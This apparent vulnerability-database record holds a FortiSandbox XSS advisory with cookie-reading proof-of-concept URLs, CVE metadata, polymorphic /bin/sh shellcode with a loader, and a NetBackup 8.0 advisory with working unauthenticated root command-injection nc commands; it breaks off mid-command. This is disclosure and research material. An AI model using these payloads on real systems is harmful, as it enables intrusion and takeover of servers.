Multiple XSS vulnerabilities in FortiSandbox WebUI
Impact
A remote unauthenticated attacker may be able to execute arbitrary code in
the security context of an authenticated user's browser session.
Affected Products
FortiSandbox 2.0.4 and lower.
Solutions
Upgrade to FortiSandbox 2.1 or above.
Vulnerability Details:
http://www.fortiguard.com/advisory/FG-IR-15-019/
The Web User Interface of FortiSandbox version 2.0.4 and below is
vulnerable to multiple reflected Cross-Site Scripting vulnerabilities.
5 potential XSS vectors were identified:
Fortiview threats by users search filtered by serial
Fortiview threats by users search filtered by vdom
Export report feature in the Fortiview search page
Screenshot download generated by the VM scan feature
PCAP file download generated by the VM scan feature
Exploit code(s):
1)
https://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 06012015')</script>&vdom=&from_time_period=1440#frag-1
vulnerable parameter: "serial"
2)
https://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>
vulnerable parameter: "urlForCreatingReport"
3)
https://localhost/analysis/detail/download/screenshot?id="/><script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>
vulnerable parameter: "id"
Disclosure Timeline:
Vendor Notification: June 1, 2015
Vendor Disclosure: July 24, 2015
August 1, 2015 : Public Disclosure
Fixed In Firmware 2.1
Discovery Status:
Published
Exploitation Technique:
Remote unauthenticated
Severity Level:
Medium
Description:
Request Method(s): [+] GET
Vulnerable Product: [+] FortiSandbox 3000D v2.02
Vulnerable Parameter(s): [+] serial, urlForCreatingReport, id
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
{"id": "SECURITYVULNS:DOC:32461", "bulletinFamily": "software", "title": "Multiple XSS vulnerabilities in FortiSandbox WebUI", "description": "\r\n\r\n[+] Credits: John Page aka hyp3rlinx\r\n\r\n[+] Website: hyp3rlinx.altervista.org\r\n\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt\r\n\r\n\r\nVendor:\r\n================================\r\nwww.fortinet.com\r\nPSIRT ID: 1418018\r\n\r\n\r\n\r\nProduct:\r\n==================================\r\nFortiSandbox 3000D v2.02 build0042\r\n\r\n\r\nVulnerability Type:\r\n===================\r\nXSS\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nPending\r\n\r\n\r\n\r\nAdvisory Information:\r\n===========================================================================\r\nMultiple XSS vulnerabilities in FortiSandbox WebUI\r\n\r\nImpact\r\n\r\nA remote unauthenticated attacker may be able to execute arbitrary code in\r\nthe security context of an authenticated user's browser session.\r\n\r\nAffected Products\r\n\r\nFortiSandbox 2.0.4 and lower.\r\nSolutions\r\n\r\nUpgrade to FortiSandbox 2.1 or above.\r\n\r\n\r\n\r\nVulnerability Details:\r\n====================================================================\r\nhttp://www.fortiguard.com/advisory/FG-IR-15-019/\r\n\r\nThe Web User Interface of FortiSandbox version 2.0.4 and below is\r\nvulnerable to multiple reflected Cross-Site Scripting vulnerabilities.\r\n\r\n5 potential XSS vectors were identified:\r\n\r\n* Fortiview threats by users search filtered by serial\r\n* Fortiview threats by users search filtered by vdom\r\n* Export report feature in the Fortiview search page\r\n* Screenshot download generated by the VM scan feature\r\n* PCAP file download generated by the VM scan feature\r\n\r\n\r\n\r\nExploit code(s):\r\n===============\r\n\r\n1)\r\nhttps://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 06012015')</script>&vdom=&from_time_period=1440#frag-1\r\n\r\nvulnerable parameter: "serial"\r\n------------------------------\r\n\r\n2)\r\nhttps://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>\r\n\r\nvulnerable parameter: "urlForCreatingReport"\r\n--------------------------------------------\r\n\r\n3)\r\nhttps://localhost/analysis/detail/download/screenshot?id="/><script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>\r\n \r\nvulnerable parameter: "id"\r\n--------------------------\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n========================================\r\nVendor Notification: June 1, 2015\r\nVendor Disclosure: July 24, 2015\r\nAugust 1, 2015 : Public Disclosure\r\n\r\nFixed In Firmware 2.1\r\n\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote unauthenticated\r\n\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\n\r\nDescription:\r\n=====================================================================\r\n\r\n\r\nRequest Method(s): [+] GET\r\n\r\n\r\nVulnerable Product: [+] FortiSandbox 3000D v2.02\r\n\r\n\r\nVulnerable Parameter(s): [+] serial, urlForCreatingReport, id\r\n\r\n\r\nAffected Area(s): [+] FortiSandbox Web Admin UI\r\n\r\n\r\n=====================================================================\r\n\r\n[+] Disclaimer\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.\r\nThe author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.\r\n\r\nby hyp3rlinx\r\n\r\n", "published": "2015-08-24T00:00:00", "modified": "2015-08-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32461", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:11:01", "edition": 1, "viewCount": 4, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2018-08-31T11:11:01", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201462", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201430"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1489.NASL", "EULEROS_SA-2020-1483.NASL"]}], "modified": "2018-08-31T11:11:01", "rev": 2}, "vulnersScore": 2.5}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2019-04-02T03:29:55", "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "published": "2019-04-01T00:00:00", "title": "Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2019-04-01T00:00:00", "id": "1337DAY-ID-32461", "href": "https://0day.today/exploit/description/32461", "sourceData": "/*\r\n; Date: 09/03/2019\r\n; Polymorphic_Execve_Sh_Stack.asm\r\n; Author: Daniele Votta\r\n; Description: This program invoke a Polimorphic version of excve.\r\n \r\nOriginal Execve_Sh_Stack: file format elf32-i386\r\nDisassembly of section .text:\r\n \r\n08048080 <_start>:\r\n 8048080: 31 c0 xor eax,eax\r\n 8048082: 50 push eax\r\n 8048083: 68 2f 2f 73 68 push 0x68732f2f\r\n 8048088: 68 2f 62 69 6e push 0x6e69622f\r\n 804808d: 89 e3 mov ebx,esp\r\n 804808f: 50 push eax\r\n 8048090: 89 e2 mov edx,esp\r\n 8048092: 53 push ebx\r\n 8048093: 89 e1 mov ecx,esp\r\n 8048095: b0 0b mov al,0xb\r\n 8048097: cd 80 int 0x80\r\n \r\n[+] Extract Shellcode ... \r\n\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n \r\nShellcode Length:25\r\n \r\n======================= POC Daniele Votta =======================\r\n \r\nPolimorphic_Execve_Sh_Stack: file format elf32-i386\r\n \r\nDisassembly of section .text:\r\n \r\n08048080 <_start>:\r\n 8048080: 31 c3 xor ebx,eax\r\n 8048082: 31 d8 xor eax,ebx\r\n 8048084: 89 c1 mov ecx,eax\r\n 8048086: 51 push ecx\r\n 8048087: bf 40 40 84 79 mov edi,0x79844040\r\n 804808c: 81 ef 11 11 11 11 sub edi,0x11111111\r\n 8048092: 89 7c 24 fc mov DWORD PTR [esp-0x4],edi\r\n 8048096: bf 2f 62 69 6e mov edi,0x6e69622f\r\n 804809b: 81 c7 11 11 11 11 add edi,0x11111111\r\n 80480a1: 81 ef 11 11 11 11 sub edi,0x11111111\r\n 80480a7: 89 7c 24 f8 mov DWORD PTR [esp-0x8],edi\r\n 80480ab: 83 ec 04 sub esp,0x4\r\n 80480ae: 83 ec 04 sub esp,0x4\r\n 80480b1: 89 e3 mov ebx,esp\r\n 80480b3: 50 push eax\r\n 80480b4: 89 e2 mov edx,esp\r\n 80480b6: 53 push ebx\r\n 80480b7: 89 e1 mov ecx,esp\r\n 80480b9: b0 01 mov al,0x1\r\n 80480bb: 04 0a add al,0xa\r\n 80480bd: cd 80 int 0x80\r\n \r\n[+] Extract Shellcode ... \r\n\"\\x31\\xc3\\x31\\xd8\\x89\\xc1\\x51\\xbf\\x40\\x40\\x84\\x79\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xfc\\xbf\\x2f\\x62\\x69\\x6e\\x81\\xc7\\x11\\x11\\x11\\x11\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xf8\\x83\\xec\\x04\\x83\\xec\\x04\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x01\\x04\\x0a\\xcd\\x80\"\r\n \r\nShellcode Length:63\r\n \r\n======================= POC Daniele Votta =======================\r\n*/\r\n \r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc3\\x31\\xd8\\x89\\xc1\\x51\\xbf\\x40\\x40\\x84\\x79\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xfc\\xbf\\x2f\\x62\\x69\\x6e\\x81\\xc7\\x11\\x11\\x11\\x11\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xf8\\x83\\xec\\x04\\x83\\xec\\x04\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x01\\x04\\x0a\\xcd\\x80\";\r\n \r\nint main()\r\n{\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\n\n# 0day.today [2019-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32461"}, {"lastseen": "2018-03-13T23:14:17", "description": "Veritas Netbackup version 8.0 suffers from remote command execution, file write, and DNS bypass vulnerabilities.", "edition": 1, "published": "2017-05-09T00:00:00", "title": "Veritas Netbackup 8.0 - Multiple Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-09T00:00:00", "href": "https://0day.today/exploit/description/27741", "id": "1337DAY-ID-27741", "sourceData": "Veritas Netbackup 8.0 - Multiple Vulnerabilities\r\n\r\n-------------------------------------------------\r\n\r\n\r\n\r\nIntroduction\r\n\r\n============\r\n\r\nMultiple vulnerabilities were identified in Veritas Netbackup (\r\nhttps://www.veritas.com/product/backup-and-recovery/netbackup-8). The\r\nvulnerabilities were discovered during a black box security assessment and\r\ntherefore the vulnerability list should not be considered exhaustive.\r\n\r\n\r\n\r\nNetBackup 8.0 was assessed by Google Security as a followup to a previous\r\nassessment of NetBackup 6.x and 7.x (see\r\nhttp://seclists.org/fulldisclosure/2017/Feb/101). After assessing the\r\nsecurity of three generations of this software it unfortunately became\r\nclear that the current architecture of NetBackup has several security flaws:\r\n\r\n\r\n\r\n -\r\n\r\n The proprietary protocol used between NB Clients and Servers provides no\r\n authentication or encryption.\r\n -\r\n\r\n Parameters passed to executable commands are (partially) processed\r\n unfiltered.\r\n -\r\n\r\n Even though a whitelisting for executable paths was added in recent\r\n versions of NetBackup, those paths contain over 600 (!) executables - a\r\n vulnerability in any of those could be leveraged to compromise a NetBackup\r\n system.\r\n -\r\n\r\n All processes related to NetBackup run as root, which increases the risk\r\n of compromise (this was already reported in a previous advisory)\r\n\r\n\r\n\r\nWe highly recommended to put additional layers of security around running\r\nNetBackup installations, for example strong firewall policies that only\r\nallow legitimate NetBackup systems to interact with each other over the\r\nnetwork.\r\n\r\n\r\n\r\nPlease see the Advisory Veritas released for more information:\r\n\r\nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html\r\n\r\n\r\n\r\nVeritas also provides patches for NetBackup 8.0 that should be applied\r\nASAP. Those can be found at the following URL:\r\n\r\nhttps://www.veritas.com/support/en_US/article.000126389\r\n\r\n\r\n\r\nAffected Software and Versions\r\n\r\n==============================\r\n\r\n - Veritas Netbackup 8.0\r\n\r\n\r\n\r\nCVE\r\n\r\n===\r\n\r\nCVEs have been assigned but are not published yet. Please see this Veritas\r\nadvisory for the CVE IDs:\r\nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html\r\n\r\n\r\n\r\nVulnerability Overview\r\n\r\n======================\r\n\r\n\r\n\r\n1. NB8-01: HIGH: Unauthenticated privileged remote command execution via\r\nbprd\r\n\r\n2. NB8-02: HIGH: Unauthenticated privileged remote command execution via\r\nnbbsdtar\r\n\r\n3. NB8-03: HIGH: Unauthenticated privileged remote file write\r\n\r\n4. NB8-04: HIGH: Unauthenticated privileged remote command execution via\r\nwhitelist bypass\r\n\r\n5. NB8-05: HIGH: Bypass of DNS based security model through pbx_exchange\r\n\r\n\r\n\r\n\r\n\r\nVulnerability Details\r\n\r\n=====================\r\n\r\n\r\n\r\n--------------------------------------------------------------------\r\n\r\nNB8-01: Unauthenticated privileged remote command execution via bprd\r\n\r\n--------------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nThe bprd process allows remote privileged remote code execution by sending\r\na special packet leveraging the C_PFI_ROTATION (0x70) command. This command\r\nis vulnerable to injecting arbitrary commands. This vulnerability bypasses\r\nthe directory whitelist implemented in NetBackup 7.x and allows privileged\r\nexecution of any command.\r\n\r\n\r\n\r\nThe following command executes a/usr/bin/id>/tmp/meh.txta on the Netbackup\r\nserver 10.128.0.5:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 112 1 2 foo\\`id>/tmp/meh.txt\\`\r\nbar baz 3 meh\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nLog file excerpt:\r\n\r\n\r\n\r\n15:27:36.467 [31611.31611] <2> get_string: 329199 112 1 2\r\nfoo`id>/tmp/meh.txt` bar baz 3 meh\r\n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic:\r\n[vnet_vxss_helper.c:641] VxSS magic=329199, remote_vxss=11\r\n2\r\n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic:\r\n[vnet_vxss_helper.c:698] Ignoring VxSS authentication 2 0x\r\n2\r\n15:27:36.467 [31611.31611] <2> process_request: command C_PFI_ROTATION\r\n(112) received\r\n15:27:36.467 [31611.31611] <2> process_request: pfi_rotation request =\r\n329199 112 1 2 foo`id>/tmp/meh.txt` bar baz 3 me\r\nh\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 31641] execve(\"/bin/sh\", [\"sh\", \"-c\",\r\n\"\\\"/usr/openv/netbackup/bin/admincmd/bppficorr\\\" -rotation -policy 2\r\n-client 1 -fim \\\"foo`id>/tmp/meh.txt`\\\" 2>&1\"], [/* 18 vars */]) = 0\r\nProcess 31642 attached\r\nProcess 31643 attached\r\n[pid 31643] execve(\"/bin/id\", [\"id\"], [/* 18 vars */]) = 0\r\n\r\n# cat /tmp/meh.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\nThe validity of API parameters should be ensured by proper filtering of\r\npassed parameters.\r\n\r\n\r\n\r\n------------------------------------------------------------------------\r\n\r\nNB8-02: Unauthenticated privileged remote command execution via nbbsdtar\r\n\r\n------------------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nThe binary nbbsdtar can be leveraged to copy any file to a whitelisted\r\ndirectory. This then allows leveraging the C_REMOTE_EXECUTE (0x46) to\r\nexecute the copied file. This vulnerability bypasses the directory\r\nwhitelist implemented in NetBackup 7.x and allows privileged execution of\r\nany command.\r\n\r\n\r\n\r\nPacking /bin/bash into the tar file /tmp/foo.tar:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/private/nbbsdtar foo -c -f /tmp/foo.tar\r\n/bin/bash\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace output:\r\n\r\n\r\n\r\n[pid 32461] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\",\r\n\"-c\", \"-f\", \"/tmp/foo.tar\", \"/bin/bash\"], [/* 19 vars */]) = 0\r\n\r\nUnpacking /tmp/foo.tar to the whitelisted directory\r\n/usr/openv/netbackup/bin (a/bina can be omitted as /bin/bash was added to\r\nthe tar with full path):\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/private/nbbsdtar foo -x -f /tmp/foo.tar -C\r\n/usr/openv/netbackup/\\n\" | nc 10.128.0.5 1556\r\n\r\nStrace output:\r\n\r\n\r\n\r\n[pid 32486] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\",\r\n\"-x\", \"-f\", \"/tmp/foo.tar\", \"-C\", \"/usr/openv/netbackup/\"], [/* 19 vars\r\n*/]) = 0\r\n\r\n# ls -l /usr/openv/netbackup/bin/bash\r\n-rwxr-xr-x. 1 root root 960472 Dec 6 23:19 /usr/openv/netbackup/bin/bash\r\n\r\nExecution of any command by running the now whitelisted bash interpreter:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/bash foo -c id>/tmp/moo.txt\\n\" | nc 10.128.0.5 1556\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 32549] execve(\"/usr/openv/netbackup/bin/bash\", [\"foo\", \"-c\",\r\n\"id>/tmp/moo.txt\"], [/* 19 vars */]) = 0\r\nProcess 32550 attached\r\n[pid 32550] execve(\"/bin/id\", [\"id\"], [/* 19 vars */]) = 0\r\n\r\n# cat /tmp/moo.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\nEven with the added whitelist, the C_REMOTE_EXECUTE API still provides\r\naccess to over 600 (!) executable binaries. It is very likely that a number\r\nof these binaries can be leveraged to bypass the current security\r\nmechanisms and provide high risk attack vectors as shown in the example\r\nabove.\r\n\r\n\r\n\r\n----------------------------------------------------\r\n\r\nNB8-03: Unauthenticated privileged remote file write\r\n\r\n----------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nThe bprd process allows remote privileged write to files by sending a\r\nspecial packet leveraging the C_REMOTE_WRITE (0x71) call. The attacker has\r\nfull control over file-name and content. The path is limited by a whitelist\r\ncheck that was implemented in NetBackup 7.x. As the C_REMOTE_WRITE function\r\ngives an attacker full control over content and filename and also allows\r\naappendinga to existing files, this issue is rated as HIGH.\r\n\r\n\r\n\r\nExample:\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 29\r\n/usr/openv/netbackup/svbl.txt a 10 helloworld \\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n[pid 1027] open(\"/usr/openv/netbackup/svbl.txt\",\r\nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7\r\n[...]\r\n\r\n[pid 1027] write(7, \"helloworld\", 10) = 10\r\n\r\n# cat /usr/openv/netbackup/svbl.txt\r\nhelloworld\r\n\r\n\r\n\r\n# ls -l /usr/openv/netbackup/svbl.txt\r\n-rw-r--r--. 1 root root 20 Feb 3 15:55 /usr/openv/netbackup/svbl.txt\r\n\r\nEven though the allowed paths are checked against a whitelist, the API is\r\nflexible enough to provide an attacker a useful entry point for further\r\nattacks. An API that allows full control over filename and content should\r\nnot be exposed to the network without authentication.\r\n\r\n\r\n\r\n--------------------------------------------------------------------------------\r\n\r\nNB8-04: Unauthenticated privileged remote command execution via whitelist\r\nbypass\r\n\r\n--------------------------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nIn NetBackup 7.x, a whitelist was added to provide a layer of security\r\nagainst arbitrary command execution via APIs provided by NetBackup.\r\nFunctionality like the C_REMOTE_WRITE API are also checked against this\r\nwhitelist. The caveat here is that this whitelisting caused problems in\r\nproduction use. To counter that, Veritas added a configuration option to\r\nadd custom paths to the whitelist, as documented here:\r\nhttps://www.veritas.com/support/en_US/article.000100775\r\n\r\n\r\n\r\nLeveraging the vulnerability described in NB8-03, it is possible to add any\r\npath to the whitelist, enabling an attacker to (over)write any file in the\r\nwhitelisted paths. The following attack chain shows an example that grants\r\nremote command execution.\r\n\r\n\r\n\r\nAdd a new whitelist entry to bp.conf:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 28\r\n/usr/openv/netbackup/bp.conf a 48 BPCD_WHITELIST_PATH =\r\n/usr/openv/netbackup/bin \\x0d\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 1550] open(\"/usr/openv/netbackup/bp.conf\",\r\nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7\r\n[...]\r\n\r\n[pid 1550] write(7, \"BPCD_WHITELIST_PATH = /usr/openv/netbackup/bin \\r\",\r\n48) = 48\r\n\r\nWrite to the now whitelisted /usr/openv/netbackup/bin path and overwrite a\r\nexecutable file:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 33\r\n/usr/openv/netbackup/bin/initbprd w 27 /usr/bin/id > /tmp/svbl.txt\\n\" | nc\r\n10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n[pid 1622] open(\"/usr/openv/netbackup/bin/initbprd\",\r\nO_WRONLY|O_CREAT|O_TRUNC|O_DSYNC, 0666) = 7\r\n[...]\r\n\r\n[pid 1622] write(7, \"/usr/bin/id > 